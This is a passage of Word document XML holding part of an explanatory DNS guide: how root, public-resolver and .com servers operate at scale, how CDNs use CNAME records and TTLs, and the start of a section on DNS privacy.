    <w:p w14:paraId="3A6E40C6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="804"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Health-checked DNS:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Use a DNS provider that removes dead IPs automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B7BA3B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="5636E68D">
          <v:rect id="_x0000_i3492" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D703C27" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17. DNS at Massive Scale — How the Big Players Do It</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C09263" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.1 How Root Servers Handle 100+ Billion Queries/Day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BCC139" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anycast + massive distribution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4D78B5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="805"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>13 root server identities, but 1,700+ physical instances worldwide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1C78CB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="805"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Each instance handles queries independently (no state shared between anycast instances).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2152D0B3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="805"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The root zone is tiny (~2MB, ~1,500 TLD delegations) — easily fits in RAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011D2B6A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="805"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Queries are simple lookups (just delegation referrals) — no recursion, no complex logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57172074" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="805"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Hardware is optimized: NVMe storage (irrelevant — all in RAM), fast NICs (10/25/100 Gbps), many CPU cores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D44DCA8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.2 How Cloudflare/Google Handle Public DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D1E828" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cloudflare 1.1.1.1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C4192E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="806"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Anycast from 300+ cities worldwide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E06BA9A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="806"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Each PoP runs recursive resolvers independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033164F7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="806"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Shared cache BETWEEN PoPs (a cache hit in Tokyo can prevent a cache miss in Osaka).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FB01FE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="806"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Prefetch popular entries before TTL expires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708831D5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="806"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Serve-stale during authoritative outages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ECB0F1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="806"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DNSSEC validation on all responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4CCB12" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="806"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Encrypted (DoH/DoT) support natively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1729E3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="806"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Processes 1+ trillion queries per day.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AEB3B9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google 8.8.8.8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773173E8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="807"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Global anycast deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3871DC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="807"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Aggressive prefetching (if a record was queried 10 times in the last TTL period, refresh it proactively before expiry).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7374D205" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="807"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>EDNS Client Subnet support (provides client subnet to authoritative servers for better GeoDNS accuracy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AA067F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="807"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Batching: multiple client queries for the same name are coalesced into a single upstream query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC81992" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.3 How Large TLD Servers (.com) Operate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7389AAF0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verisign operates .com TLD nameservers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036F9C2C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="808"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The .com zone contains ~160 million domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC6F582" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="808"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Zone file is ~15GB (compressed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC57EE7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="808"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Distributed across 100+ anycast sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A2355E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="808"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Handles 40+ billion queries per day.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE61BA3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="808"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Zone updates every few minutes (domain registrations/changes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BEF071" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="808"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Uses custom-built nameserver software optimized for this scale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101AE9AF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="1337A0AB">
          <v:rect id="_x0000_i3493" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73838EC0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18. DNS and CDN Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19085416" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.1 How CDN DNS Resolution Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8E9F0A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>When you configure a CDN (e.g., www.example.com via Cloudflare):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7834AC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17899602" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>www.example.com.    300    IN    CNAME    www.example.com.cdn.cloudflare.net.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144C974E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>www.example.com.cdn.cloudflare.net.    60    IN    A    104.16.132.229</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5955573D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The complete resolution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A009913" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="809"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Client queries www.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FD468B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="809"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Gets CNAME → www.example.com.cdn.cloudflare.net.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668817C3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="809"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Queries Cloudflare's authoritative DNS for this name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0488CE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="809"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Cloudflare's DNS server uses the client's location (from resolver IP or ECS) to return the nearest edge server's IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F010F11" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="809"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Client connects to the nearest edge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ABDCE9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="809"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Edge serves cached content (or fetches from origin if miss).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A46B966" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The CNAME chain problem with apex domains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16436755" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>example.com (naked domain) cannot have a CNAME (it already has SOA + NS records).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DFE339" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521CD627" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="810"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ALIAS/ANAME record (proprietary):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> DNS provider resolves the CNAME itself and returns the A record. Client sees a direct A record (no CNAME chain). Implemented by Cloudflare, Route 53, DNSimple.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375064D8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="810"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cloudflare's approach:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Since Cloudflare IS both the DNS provider and the CDN, they simply return the edge IP directly for the apex domain (no CNAME needed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223981AC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.2 DNS TTL and CDN Cache Interactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133056BD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN cache TTL vs. DNS TTL — they're different things:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407C4D6D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="811"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS TTL:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> How long clients cache the IP address of the CDN edge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB33459" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="811"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN Cache TTL (Cache-Control):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> How long the edge caches the content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EC2DCC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Confusion scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A5C181" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="812"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DNS TTL = 300s (client re-resolves every 5 min).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FD35E6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="812"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>CDN Cache TTL = 3600s (edge keeps content for 1 hour).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05098FB3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="812"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>You update content at origin. Edge still serves stale content for up to 1 hour (DNS TTL is irrelevant here — the client already found the edge, the edge serves stale cache).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADA8305" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>To invalidate CDN content:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Purge the CDN cache (not change DNS). DNS TTL only matters for routing changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE12B1D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="581B73BF">
          <v:rect id="_x0000_i3494" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="583FB846" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19. DNS Privacy and Modern Developments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8D2CE0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19.1 The Privacy Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FF3FE1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Traditional DNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C425E8D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="813"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Queries are in plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09320977" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="813"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Your ISP sees every domain you resolve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA1BD38" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="813"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Any network intermediary can log, modify, or block queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE506E0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="813"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>WiFi operators, corporate networks, governments — all have visibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F45B10B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What they can learn from DNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA5BB87" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="814"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Every website you visit.</w:t>
      </w:r>
    </w:p>
